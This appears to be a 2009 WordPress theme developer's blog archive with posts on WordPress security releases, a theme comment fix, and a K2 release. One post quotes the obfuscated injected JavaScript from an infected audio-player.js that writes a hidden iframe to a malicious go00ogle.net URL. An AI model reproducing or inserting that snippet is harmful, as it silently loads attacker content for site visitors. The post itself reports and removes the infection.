The WordPress team decided to call 2.8.5 a hardening release because it includes some security features that were back-ported to 2.8.x from the upcoming 2.9 series. Below are some details about 2.8.5 from the WordPress development blog:
As you know over the past couple of months we have been working on the new features for WordPress 2.9. We have also been working on trying to make WordPress as secure as possible and during this process we have identified a number of security hardening changes that we thought were worth back-porting to the 2.8 branch so as to get these improvements out there and make all your sites as secure as possible.
The headline changes in this release are:
A fix for the Trackback Denial-of-Service attack that is currently being seen.
Removal of areas within the code where php code in variables was evaluated.
Switched the file upload functionality to be whitelisted for all users including Admins.
Retiring of the two importers of Tag data from old plugins.
For some time now, comments have been disabled on pages in K2 and Unwakeable. The modifications needed to allow comments on pages are extremely easy to make. If you use either of these themes and wish to enable comments on pages, please continue reading.
1. Open the page.php file located in your K2 or Unwakeable theme directory. Go to line 36, it should look like this:
<?php if ( get_post_custom_values('comments') ): ?>
2. Comment out that if statement, so it should look like this when you’re done:
3. You’re halfway done at this point. Now go to line 40, which should look like this:
<?php endif; ?>
4. Comment out this piece of code as well, so modify line 40 so it looks like the code below.
<?php //endif; ?>
5. Save the page.php file and you should be all set.
I will make this modification in the next release of Unwakeable so you won’t have to modify it yourself. You can expect to see a new version of Unwakeable released within a week.
WordPress 2.8.4 has been released. It’s a security release, which means you should upgrade immediately. This version fixes a problem that could allow remote users to reset the administrative password. Below is a summary from the WordPress development blog:
Yesterday a vulnerability was discovered: a specially crafted URL could be requested that would allow an attacker to bypass a security check to verify a user requested a password reset. As a result, the first account without a key in the database (usually the admin account) would have its password reset and a new password would be emailed to the account owner. This doesn’t allow remote access, but it is very annoying.
Published by Tyler on August 11, 2009 at 9:42 am1 Comment
So, as many visitors have probably noticed, longren.org has been listed as a suspicious site by Google. Visiting this site in Firefox will result in Firefox warning you that you could be visiting a website that could harm your computer.
Turns out this blog was infected with a go00ogle.net malware script. After following this helpful blog post, I was able to pinpoint the Audio Player plugin for WordPress as the culprit. The infected file was audio-player.js, and contained this snippet of code that should not have been there:
function advQuery(){
var adv="http://google.com/";abs=unescape("%69%66%72%61%6D%65");Track="?sid=1";get=unescape("%6E%65%74");
document.write("<"+abs+" src="+adv.substr(0,9)+unescape("\u0030\u0030")+adv.substr(9,5));
document.write(get+"/go.php"+Track+" style=display:none><"+"/"+abs+">");
};advQuery();
I decided to just deactivate that plugin instead of deleting that piece of code from audio-player.js. This way there’s no chance audio-player.js will become infected again.
K2 1.0-RC8 has been released. It has support for threaded comments and child themes. You can also edit the post meta without having to modify any code now. A list of bug fixes can be found here, and below is the full post from the K2 blog:
This release adds support for Threaded Comments and Child Themes. Styles have been improved. You can specify where Styles are stored at, activate multiple styles, and edit them in the WordPress Theme Editor. You can also now customize the Post Meta (the line that reads Published by John Doe…) without having to edit any code.
I plan on building the next version of Unwakeable in the next couple weeks and will likely base it off of K2 1.0-RC8.
